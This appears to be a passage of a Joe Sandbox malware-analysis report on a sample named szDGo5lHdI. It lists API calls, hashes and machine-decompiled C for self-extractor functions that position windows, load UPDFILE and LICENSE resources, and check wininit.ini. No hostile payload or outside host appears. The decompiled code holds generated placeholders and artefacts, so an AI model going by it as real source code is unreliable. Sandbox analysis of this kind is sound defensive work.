                                                                                                                                                                                                                                    0x00402955
                                                                                                                                                                                                                                    0x0040295e
                                                                                                                                                                                                                                    0x00402962
                                                                                                                                                                                                                                    0x00402969
                                                                                                                                                                                                                                    0x0040296f
                                                                                                                                                                                                                                    0x00402974
                                                                                                                                                                                                                                    0x0040297e
                                                                                                                                                                                                                                    0x0040298c
                                                                                                                                                                                                                                    0x00402a20
                                                                                                                                                                                                                                    0x00402a21
                                                                                                                                                                                                                                    0x00402a27
                                                                                                                                                                                                                                    0x00402a4c
                                                                                                                                                                                                                                    0x00402a4f
                                                                                                                                                                                                                                    0x00402a50
                                                                                                                                                                                                                                    0x00402a53
                                                                                                                                                                                                                                    0x00402a56
                                                                                                                                                                                                                                    0x00402a5c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004029b2
                                                                                                                                                                                                                                    0x004029b2
                                                                                                                                                                                                                                    0x004029b5
                                                                                                                                                                                                                                    0x004029bd
                                                                                                                                                                                                                                    0x004029c3
                                                                                                                                                                                                                                    0x004029cc
                                                                                                                                                                                                                                    0x004029d5
                                                                                                                                                                                                                                    0x004029d7
                                                                                                                                                                                                                                    0x004029da
                                                                                                                                                                                                                                    0x004029dd
                                                                                                                                                                                                                                    0x004029df
                                                                                                                                                                                                                                    0x004029ec
                                                                                                                                                                                                                                    0x004029f8
                                                                                                                                                                                                                                    0x004029fc
                                                                                                                                                                                                                                    0x004029ff
                                                                                                                                                                                                                                    0x00402a02
                                                                                                                                                                                                                                    0x00402a07
                                                                                                                                                                                                                                    0x00402a0a
                                                                                                                                                                                                                                    0x00402a0f
                                                                                                                                                                                                                                    0x00402a19
                                                                                                                                                                                                                                    0x00402a81
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402a0f
                                                                                                                                                                                                                                    0x0040298c
                                                                                                                                                                                                                                    0x00402974
                                                                                                                                                                                                                                    0x00402962
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040294f
                                                                                                                                                                                                                                    0x00402912
                                                                                                                                                                                                                                    0x00402a65
                                                                                                                                                                                                                                    0x00402a68
                                                                                                                                                                                                                                    0x00402a6c
                                                                                                                                                                                                                                    0x00402a6f
                                                                                                                                                                                                                                    0x00402a6f
                                                                                                                                                                                                                                    0x00402a7d

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32 ref: 00402A6F
                                                                                                                                                                                                                                      • Part of subcall function 00402773: CharUpperA.USER32(8F135E3B,00000000,00000000,00000000), ref: 004027A8
                                                                                                                                                                                                                                      • Part of subcall function 00402773: CharNextA.USER32(0000054D), ref: 004027B5
                                                                                                                                                                                                                                      • Part of subcall function 00402773: CharNextA.USER32(00000000), ref: 004027BC
                                                                                                                                                                                                                                      • Part of subcall function 00402773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402829
                                                                                                                                                                                                                                      • Part of subcall function 00402773: RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402852
                                                                                                                                                                                                                                      • Part of subcall function 00402773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402870
                                                                                                                                                                                                                                      • Part of subcall function 00402773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 004028A0
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00403938,?,?,?,?,-00000005), ref: 00402958
                                                                                                                                                                                                                                    • GlobalLock.KERNEL32 ref: 00402969
                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00403938,?,?,?,?,-00000005,?), ref: 00402A21
                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00403938,?,?), ref: 00402A81
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                    • String ID: 89@
                                                                                                                                                                                                                                    • API String ID: 3949799724-2908856592
                                                                                                                                                                                                                                    • Opcode ID: 2b24d5433026d87cd8067df8aac39d6b4553280ec6bde926f4b9e96b3cf03a94
                                                                                                                                                                                                                                    • Instruction ID: 44ac0b4ed5788b328005fe1e31761a07754ab552c57995065579413dcf6dc051
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b24d5433026d87cd8067df8aac39d6b4553280ec6bde926f4b9e96b3cf03a94
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61511A31E00219DBCB21DFA9C988AAEB7B5FF48704F14407AE901B3391DB759A41DF99
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004043D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E004043D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x408004; // 0x8f135e3b
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00406CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}
























                                                                                                                                                                                                                                    0x004043d0
                                                                                                                                                                                                                                    0x004043d8
                                                                                                                                                                                                                                    0x004043df
                                                                                                                                                                                                                                    0x004043e6
                                                                                                                                                                                                                                    0x004043ec
                                                                                                                                                                                                                                    0x004043f1
                                                                                                                                                                                                                                    0x00404400
                                                                                                                                                                                                                                    0x00404403
                                                                                                                                                                                                                                    0x0040440b
                                                                                                                                                                                                                                    0x00404420
                                                                                                                                                                                                                                    0x00404429
                                                                                                                                                                                                                                    0x00404437
                                                                                                                                                                                                                                    0x00404444
                                                                                                                                                                                                                                    0x00404447
                                                                                                                                                                                                                                    0x0040444d
                                                                                                                                                                                                                                    0x00404454
                                                                                                                                                                                                                                    0x0040445b
                                                                                                                                                                                                                                    0x00404460
                                                                                                                                                                                                                                    0x00404461
                                                                                                                                                                                                                                    0x00404467
                                                                                                                                                                                                                                    0x0040446f
                                                                                                                                                                                                                                    0x00404473
                                                                                                                                                                                                                                    0x00404473
                                                                                                                                                                                                                                    0x00404463
                                                                                                                                                                                                                                    0x00404463
                                                                                                                                                                                                                                    0x00404463
                                                                                                                                                                                                                                    0x0040447a
                                                                                                                                                                                                                                    0x00404481
                                                                                                                                                                                                                                    0x00404484
                                                                                                                                                                                                                                    0x0040448a
                                                                                                                                                                                                                                    0x00404492
                                                                                                                                                                                                                                    0x00404496
                                                                                                                                                                                                                                    0x00404496
                                                                                                                                                                                                                                    0x00404486
                                                                                                                                                                                                                                    0x00404486
                                                                                                                                                                                                                                    0x00404486
                                                                                                                                                                                                                                    0x004044b8

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004043F1
                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0040440B
                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00404423
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040442E
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040443A
                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00404447
                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 004044A2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2212493051-0
                                                                                                                                                                                                                                    • Opcode ID: 53cb3f9c8d94e0ba8da14288bef56b7f65c9e83190bda8a924e586b622268b32
                                                                                                                                                                                                                                    • Instruction ID: 70268ef729a394680d9897d7bab053961038611fd3359a441dc99da7ee3ef4ca
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53cb3f9c8d94e0ba8da14288bef56b7f65c9e83190bda8a924e586b622268b32
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA315E72E00219AFCB14CFB8DE889EEBBB5EB89310F154179F905F7280DA346C058B65
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00406298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E00406298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x408004; // 0x8f135e3b
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0040171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x409124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x40a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0040171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00406CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}






















                                                                                                                                                                                                                                    0x00406298
                                                                                                                                                                                                                                    0x004062a0
                                                                                                                                                                                                                                    0x004062a7
                                                                                                                                                                                                                                    0x004062ad
                                                                                                                                                                                                                                    0x004062af
                                                                                                                                                                                                                                    0x004062bb
                                                                                                                                                                                                                                    0x004062c3
                                                                                                                                                                                                                                    0x004062c4
                                                                                                                                                                                                                                    0x0040633b
                                                                                                                                                                                                                                    0x0040633b
                                                                                                                                                                                                                                    0x00406345
                                                                                                                                                                                                                                    0x0040634d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004062da
                                                                                                                                                                                                                                    0x004062de
                                                                                                                                                                                                                                    0x0040635f
                                                                                                                                                                                                                                    0x00406369
                                                                                                                                                                                                                                    0x004062e0
                                                                                                                                                                                                                                    0x004062e0
                                                                                                                                                                                                                                    0x004062e0
                                                                                                                                                                                                                                    0x004062e3
                                                                                                                                                                                                                                    0x004062e5
                                                                                                                                                                                                                                    0x004062e5
                                                                                                                                                                                                                                    0x004062e8
                                                                                                                                                                                                                                    0x004062e8
                                                                                                                                                                                                                                    0x004062ea
                                                                                                                                                                                                                                    0x004062eb
                                                                                                                                                                                                                                    0x004062ef
                                                                                                                                                                                                                                    0x004062f1
                                                                                                                                                                                                                                    0x004062f3
                                                                                                                                                                                                                                    0x00406302
                                                                                                                                                                                                                                    0x00406308
                                                                                                                                                                                                                                    0x0040630d
                                                                                                                                                                                                                                    0x00406314
                                                                                                                                                                                                                                    0x00406314
                                                                                                                                                                                                                                    0x00406316
                                                                                                                                                                                                                                    0x00406319
                                                                                                                                                                                                                                    0x00406355
                                                                                                                                                                                                                                    0x00406357
                                                                                                                                                                                                                                    0x0040631b
                                                                                                                                                                                                                                    0x0040631b
                                                                                                                                                                                                                                    0x00406331
                                                                                                                                                                                                                                    0x00406334
                                                                                                                                                                                                                                    0x00406339
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406339
                                                                                                                                                                                                                                    0x00406319
                                                                                                                                                                                                                                    0x0040636b
                                                                                                                                                                                                                                    0x0040637d
                                                                                                                                                                                                                                    0x0040637d
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040171E: _vsnprintf.MSVCRT ref: 00401750
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,004051CA,00000004,00000024,00402F71,?,00000002,00000000), ref: 004062CD
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,004051CA,00000004,00000024,00402F71,?,00000002,00000000), ref: 004062D4
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,004051CA,00000004,00000024,00402F71,?,00000002,00000000), ref: 0040631B
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00406345
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,004051CA,00000004,00000024,00402F71,?,00000002,00000000), ref: 00406357
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                    • String ID: UPDFILE%lu
                                                                                                                                                                                                                                    • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                    • Opcode ID: 4b8ed84f8ef8dd9f3ee80327505b0d0b280beef1f62c1a701c66735b5403776f
                                                                                                                                                                                                                                    • Instruction ID: dd4f3df3a962844db1ec0a9a12a2e8c46ac7e37050f014d08e7a5875b9a49fb5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b8ed84f8ef8dd9f3ee80327505b0d0b280beef1f62c1a701c66735b5403776f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2212631A00219ABDB10AF649C459BFBB78EB44714B01413AFD02B3291DB398D228BE9
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00403A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00403A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0040468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x408d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0040468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x408d4c, "<None>") == 0) {
							LocalFree( *0x408d4c);
							L9:
							 *0x409124 = 0;
							return 1;
						}
						_t9 = E00406517(_t19, 0x7d1, 0, E00403100, 0, 0);
						LocalFree( *0x408d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x409124 = 0x800704c7;
						L2:
						return 0;
					}
					E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x408d4c);
					 *0x409124 = 0x80070714;
					goto L2;
				}
				E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x409124 = E00406285();
				goto L2;
			}






                                                                                                                                                                                                                                    0x00403a46
                                                                                                                                                                                                                                    0x00403a57
                                                                                                                                                                                                                                    0x00403a5d
                                                                                                                                                                                                                                    0x00403a63
                                                                                                                                                                                                                                    0x00403a6a
                                                                                                                                                                                                                                    0x00403a91
                                                                                                                                                                                                                                    0x00403a9a
                                                                                                                                                                                                                                    0x00403ad8
                                                                                                                                                                                                                                    0x00403b13
                                                                                                                                                                                                                                    0x00403b19
                                                                                                                                                                                                                                    0x00403b1b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403b21
                                                                                                                                                                                                                                    0x00403ae7
                                                                                                                                                                                                                                    0x00403af4
                                                                                                                                                                                                                                    0x00403afc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403afe
                                                                                                                                                                                                                                    0x00403a87
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403a87
                                                                                                                                                                                                                                    0x00403aa8
                                                                                                                                                                                                                                    0x00403ab3
                                                                                                                                                                                                                                    0x00403ab9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403ab9
                                                                                                                                                                                                                                    0x00403a78
                                                                                                                                                                                                                                    0x00403a82
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00402F64,?,00000002,00000000), ref: 00403A5D
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00403AB3
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
                                                                                                                                                                                                                                      • Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(<None>,00000000), ref: 00403AD0
                                                                                                                                                                                                                                    • LocalFree.KERNEL32 ref: 00403B13
                                                                                                                                                                                                                                      • Part of subcall function 00406517: FindResourceA.KERNEL32(00400000,000007D6,00000005), ref: 0040652A
                                                                                                                                                                                                                                      • Part of subcall function 00406517: LoadResource.KERNEL32(00400000,00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00406538
                                                                                                                                                                                                                                      • Part of subcall function 00406517: DialogBoxIndirectParamA.USER32(00400000,00000000,00000547,004019E0,00000000), ref: 00406557
                                                                                                                                                                                                                                      • Part of subcall function 00406517: FreeResource.KERNEL32(00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00406560
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00403100,00000000,00000000), ref: 00403AF4
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$LICENSE
                                                                                                                                                                                                                                    • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                    • Opcode ID: aaab1e1078a32d10607d726acafb9d5d89a0e5ddb8b2aa24b25a32d22a887e56
                                                                                                                                                                                                                                    • Instruction ID: c2af970f7a243ccd3f2ce706e414ce787b41af5121a45e16be6e15035c564ba5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aaab1e1078a32d10607d726acafb9d5d89a0e5ddb8b2aa24b25a32d22a887e56
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D117570301201ABD724AF329E09E1739BDDFD9715B10453FBA45F92F1DA7D88108A6D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004024E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E004024E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x408004; // 0x8f135e3b
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0040658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00406CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}











                                                                                                                                                                                                                                    0x004024e0
                                                                                                                                                                                                                                    0x004024eb
                                                                                                                                                                                                                                    0x004024f2
                                                                                                                                                                                                                                    0x004024f7
                                                                                                                                                                                                                                    0x00402504
                                                                                                                                                                                                                                    0x0040250e
                                                                                                                                                                                                                                    0x0040251d
                                                                                                                                                                                                                                    0x0040252c
                                                                                                                                                                                                                                    0x00402541
                                                                                                                                                                                                                                    0x00402546
                                                                                                                                                                                                                                    0x00402553
                                                                                                                                                                                                                                    0x00402555
                                                                                                                                                                                                                                    0x00402555
                                                                                                                                                                                                                                    0x00402546
                                                                                                                                                                                                                                    0x0040256c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00402506
                                                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0040252C
                                                                                                                                                                                                                                    • _lopen.KERNEL32(?,00000040), ref: 0040253B
                                                                                                                                                                                                                                    • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0040254C
                                                                                                                                                                                                                                    • _lclose.KERNEL32(00000000), ref: 00402555
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                    • String ID: wininit.ini
                                                                                                                                                                                                                                    • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                    • Opcode ID: e5bfc17c874d528b85d8689bce10905d582a2a6edb60c1a6a67f41529dce9f18
                                                                                                                                                                                                                                    • Instruction ID: b90c4bb04f39e14ed539eb2b0743deceed2c1c4aa6b7f5bd2816e63d70cf6699
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5bfc17c874d528b85d8689bce10905d582a2a6edb60c1a6a67f41529dce9f18
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 950192326002286BD720AF659E0CEDB7B7CDB45754F01017AFA49F31D0DA788E558AA9
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004036EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E004036EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x408004; // 0x8f135e3b
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
